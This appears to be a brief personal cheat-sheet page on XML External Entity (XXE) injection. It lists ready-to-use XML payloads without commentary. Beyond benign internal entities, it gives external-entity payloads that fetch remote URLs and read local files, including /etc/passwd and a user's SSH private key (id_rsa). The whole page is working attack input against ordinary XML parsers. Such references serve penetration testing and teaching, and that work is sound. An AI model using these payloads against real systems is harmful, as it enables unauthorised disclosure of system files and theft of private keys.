Skip to content

XML External Entity (XEE)

variables

<?xml version="1.0"?>
<!DOCTYPE root[
        <!ENTITY myName "Michal">
        <!ENTITY mySurname "Szalkowski">
        ]>
<root>
    <text>&myName; &mySurname;</text>
</root>

webContent

<?xml version="1.0"?>
<!DOCTYPE root [ <!ENTITY webContent SYSTEM "http://log.michalszalkowski.com/lorem.txt">]>
<root>
    <text>&webContent;</text>;
</root>

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY webContent SYSTEM "robots.txt">]>
<root>
    <text>&webContent;</text>;
</root>

fileContent

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY fileContent SYSTEM "/etc/passwd">]>
<root>&fileContent;</root>

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY fileContent SYSTEM "/home/falcon/.ssh/id_rsa">]>
<root>&fileContent;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY fileContent SYSTEM 'file:///etc/passwd'>]>
<root>
    <text>&fileContent;</text>
</root>